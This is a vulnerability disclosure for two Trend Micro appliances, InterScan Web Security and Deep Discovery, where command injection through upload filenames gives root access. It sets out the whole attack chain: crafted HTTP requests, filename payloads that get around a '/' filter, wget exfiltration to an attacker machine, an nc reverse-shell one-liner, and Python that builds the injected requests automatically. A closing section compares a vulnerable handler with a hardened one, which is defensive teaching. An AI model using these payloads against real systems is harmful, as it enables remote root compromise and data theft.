Multiple Vulnerabilities – Trend Micro Control Manager 6.0

The following are publicly disclosed vulnerabilities I discovered in Trend Micro Control Manager 6.0.

Full details of the vulnerabilities have not been agreed upon for disclosure, so this is more for record-keeping than anything else. Please do not inquire about details, as there is no agreement in place for me to divulge any. As much as I would love to discuss and help, I prefer staying out of jail much more 🙂

  • ZDI-CAN-3634 – Closed without public disclosure (unknown reasoning as it was/is a valid finding)

SQL Injection with RCE:

XXE:

XPATH Injection:

ZDI-16-348: Trend Micro InterScan Web Security ManagePatches filename Remote Code Execution Vulnerability

Version: IWSVA65sp2

Summary:

The com.trend.iwss.gui.servlet.ManagePatches servlet contains a flaw allowing any authenticated user (including 'Report Only' users) to execute commands under the context of the root user.

Details:

The com.trend.iwss.gui.servlet.ManagePatches servlet is used by elevated-privilege users to upload files (patches). The functionality, however, can be used by any authenticated user simply by substituting their own cookie into the request (below is a stripped-down sample of a valid request).

POST /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload HTTP/1.1
Host: <server IP>:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<server IP>:8443/admin_patch_mgmt2.jsp?CSRFGuardToken=MQG8WJXIT4J8GASYYA7OVCXXBKUIGG5D
Cookie: JSESSIONID=<INSERT COOKIE VALUE HERE>
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------141658507810329061771972399818
Content-Length: 259

-----------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml"
Content-Type: text/xml

-----------------------------141658507810329061771972399818--

The actual injection takes place in the name of the file being uploaded. The injection is blind, so the following two tests confirm execution by timing: the first should delay the response by roughly ten seconds, the second by roughly thirty. A delay that scales with the ping count indicates that command execution is occurring.

Initial test:

-----------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml&ping 127.0.0.1 -c 10"
Content-Type: text/xml

Secondary test:

-----------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml&ping 127.0.0.1 -c 30"
Content-Type: text/xml

This gives any authenticated user the ability to execute simple non-interactive commands. More complex ones, including a remote shell, are possible as well.

Issuing a 'wget <ip>' against the attacker's machine produces a hit in its web server log, so outbound connections from the appliance work. Exfiltrating information is a bit trickier: special characters like '/', '<' and '>' are not passed through to the server. The environment itself, however, can supply them. $PATH on the appliance begins with '/', so its first character can be cut out and spliced into the command. Below is an example of running wget to retrieve the current user with the given command (where [ip address] is your receiving machine):

Command –

filename="test.xml&wget `echo [ip address]``echo $PATH | cut -c1``id`"

EXPLANATION: using backticks (or $()) for command substitution, the '/' character is pulled from the first position of the current $PATH and inserted into the command, producing the full request wget [ip address]/<output of id>. Because none of the substitutions contain whitespace outside the backticks, the shell still treats the whole thing as one argument.

Apache Log – (screenshot not reproduced)

This grants the ability to exfiltrate some data, as well as to upload files (via wget).

Now the attacker has the ability to create a shell by uploading a file containing the following:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names it shell, then uploads it using this vulnerability and wget:

test.xml&wget `echo [ip address]``echo $PATH | cut -c1`shell

Once the file has been uploaded (it will be placed in the /var/iwss/patch/bin folder), the attacker can chmod it and then execute it as a script, creating a reverse shell running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell


CVE-2016-5840: Trend Micro Deep Discovery hotfix_upload.cgi filename Remote Code Execution Vulnerability

Version: TDA 2.6.1062r1

Summary:

The hotfix_upload.cgi file contains a flaw allowing a user to execute commands under the context of the root user.

Details:

The hotfix_upload.cgi file is used to upload files (hotfixes). Below is a sample of the upload function being used:

POST /cgi-bin/hotfix_upload.cgi?sID=hotfix_temp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://<server IP>/cgi-bin/hotfix_history.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: multipart/form-data; boundary=---------------------------7e0823930136
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: <server IP>
Content-Length: 206
Connection: close
Cache-Control: no-cache
Cookie: session_id=

-----------------------------7e0823930136
Content-Disposition: form-data; name="ajaxuploader_file"; filename="test.txt"
Content-Type: text/plain

a
-----------------------------7e0823930136--

The actual injection takes place in the name of the file being uploaded (i.e. filename="test.txt&id"). Unlike the InterScan case above, this one is not blind: performing that request, the system information is sent back in the response (screenshot not reproduced).

This gives any user the ability to execute simple non-interactive commands. More complex ones, including a remote shell, are possible as well.

Special characters like '/', '<' and '>' are not passed through to the server, but the environment itself can supply them. Below is an example of using this method to retrieve the /etc/passwd file (NOTE: `echo $PATH | cut -c1` evaluates to '/' in the final command; screenshot of the request not reproduced).

Now the attacker has the ability to create a shell by uploading a file containing the following (where [ip address] is your receiving machine):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names it shell, then uploads it using this vulnerability and wget:

test.txt&wget http:`echo $PATH | cut -c1``echo $PATH | cut -c1`[ip]`echo $PATH | cut -c1`shell

Once the file has been uploaded (it will be placed in /opt/TrendMicro/MinorityReport/www/cgi-bin), the attacker can chmod it and then execute it as a script, creating a reverse shell running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell
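The same filename trick carries both the InterScan ManagePatches chain and the Deep Discovery hotfix_upload.cgi chain above. The following Python is an added example, not the author's or Trend Micro's code: it generalizes the `echo $PATH | cut -c1` substitution to every '/' in a command, refuses payloads that would still contain a character the write-up says is dropped, assembles the multipart body by hand so the backticks go out unaltered, and verifies with a local sh what the appliance's shell would make of the encoded word. The attacker address 10.0.0.5 is a placeholder; the form field name and boundary are modelled on the requests above, and the wget URL uses the http:// form from the Deep Discovery section.

```python
import subprocess
from typing import List

# Characters the write-up reports as dropped before the filename reaches the shell.
FILTERED = frozenset("/<>")

# Command substitution that evaluates to "/" on the appliance: $PATH begins with "/"
# (e.g. /usr/bin:/bin), so its first character is a slash. Taken from the write-up.
SLASH = "`echo $PATH | cut -c1`"


def encode_slashes(cmd: str) -> str:
    """Replace every '/' in a command with the SLASH substitution.

    The substitution has no whitespace outside the backticks, so the shell still
    sees one word: 'cat /etc/passwd' becomes
    'cat `echo $PATH | cut -c1`etc`echo $PATH | cut -c1`passwd'.
    """
    return cmd.replace("/", SLASH)


def injected_filename(base: str, cmd: str) -> str:
    """Build the filename value '<base>&<cmd>' with '/' encoded.

    '&' terminates whatever command the server builds around the name and runs
    ours alongside it. Raise if a filtered character would still be present
    (a '<' or '>' redirection, for instance, cannot be used in the filename).
    """
    payload = f"{base}&{encode_slashes(cmd)}"
    leftover = FILTERED.intersection(payload)
    if leftover:
        raise ValueError(f"payload still contains filtered characters: {sorted(leftover)}")
    return payload


def reverse_shell_chain(attacker: str, base: str = "test.xml") -> List[str]:
    """The three filename values from the write-up, in order: fetch the 'shell'
    script from the attacker's web server, make it executable, run it."""
    return [
        injected_filename(base, f"wget http://{attacker}/shell"),
        injected_filename(base, "chmod a+x shell"),
        injected_filename(base, "./shell"),
    ]


def multipart_body(field: str, filename: str, content: bytes,
                   boundary: str = "---------------------------141658507810329061771972399818") -> bytes:
    """Assemble the multipart/form-data body by hand so the crafted filename is
    sent byte-for-byte (an HTTP library may quote or escape it)."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: text/xml\r\n"
        "\r\n"
    ).encode()
    return head + content + f"\r\n--{boundary}--\r\n".encode()


def expand_in_sh(word: str) -> str:
    """What a POSIX shell makes of an encoded word. Runs a local sh with a PATH
    that begins with '/', as on the appliances; used here only to verify the trick."""
    result = subprocess.run(
        ["sh", "-c", f"printf '%s' {word}"],
        env={"PATH": "/usr/bin:/bin"},
        capture_output=True, text=True, check=True,
    )
    return result.stdout


if __name__ == "__main__":
    for step in reverse_shell_chain("10.0.0.5"):   # 10.0.0.5 is a placeholder address
        print(step)
    print(expand_in_sh(encode_slashes("http://10.0.0.5/shell")))
```

Each value returned by reverse_shell_chain goes into its own upload request via multipart_body, with the session cookie of whatever account is at hand; the body content can stay empty, since only the filename matters.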

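Both advisories share one root cause: a client-supplied filename is spliced into a command that runs through a shell as root, and the stripping of '/', '<' and '>' observed above is a denylist that leaves '&', backticks and $() untouched. The following Python is an added, illustrative example (not Trend Micro's code, whose handlers are not shown on this page) of that bug class beside a hardened handler. The vulnerable version really runs the injected command, into a temporary directory standing in for /var/iwss/patch/bin; the hardened one checks the caller's role first, allowlists the name, confines the final path, and writes the file without any shell. The role names and the "cat > name" command line are assumptions made for the demonstration.

```python
import re
import subprocess
import tempfile
from pathlib import Path


def _patch_dir(dest) -> Path:
    """Stand-in for the appliance's patch directory (/var/iwss/patch/bin in the
    write-up): a fresh temporary directory keeps the demo self-contained."""
    return Path(dest) if dest is not None else Path(tempfile.mkdtemp(prefix="patchdemo-"))


def store_patch_vulnerable(filename: str, data: bytes, dest=None) -> Path:
    """VULNERABLE: mimics the behaviour observed above. '/', '<' and '>' are
    stripped, then the name is pasted into a command line run through the shell.
    '&', backticks and $() pass the denylist, so a filename of 'test.xml&id' runs
    id with the server's privileges (root on the appliances)."""
    d = _patch_dir(dest)
    cleaned = filename.replace("/", "").replace("<", "").replace(">", "")
    # Assumed shape of the real handler's command: store the upload under its name.
    subprocess.run(f"cat > {cleaned}", shell=True, cwd=d, input=data, check=False)
    return d


# Allowlist: one leading alphanumeric, then up to 127 of [A-Za-z0-9._-]. No shell
# metacharacter can match, so there is nothing to strip and nothing to bypass.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def store_patch_hardened(filename: str, data: bytes, role: str, dest=None) -> Path:
    """HARDENED: authorise first (the IWSVA servlet accepted 'Report Only' users),
    validate the name against the allowlist, confine the final path to the patch
    directory, and write with plain file I/O so no shell ever sees the name."""
    if role != "admin":                          # assumed role name
        raise PermissionError("patch upload requires an administrator session")
    name = Path(filename).name                   # ignore any client-sent directory part
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected filename {filename!r}")
    d = _patch_dir(dest).resolve()
    target = (d / name).resolve()
    if target.parent != d:                       # defence in depth against traversal
        raise ValueError("target escapes the patch directory")
    with open(target, "xb") as fh:               # 'x': never clobber an existing patch
        fh.write(data)
    return target


def upload_rejected(filename: str, role: str = "admin") -> bool:
    """True if the hardened handler refuses the upload; exercises the checks above."""
    try:
        store_patch_hardened(filename, b"", role)
    except (PermissionError, ValueError):
        return True
    return False


if __name__ == "__main__":
    d = store_patch_vulnerable("test.xml&touch marker", b"patch bytes")
    print("vulnerable handler ran the injected command:", (d / "marker").exists())
    for name in ("hotfix-1.tar.gz", "test.xml&id", "a`id`.xml", "$(id).xml"):
        print(f"{name!r} rejected by hardened handler:", upload_rejected(name))
```

Note that the hardened version never executes anything it stores: a patch mechanism that must run uploaded code should additionally verify a vendor signature over the file before doing so, which is a separate control from the filename handling shown here.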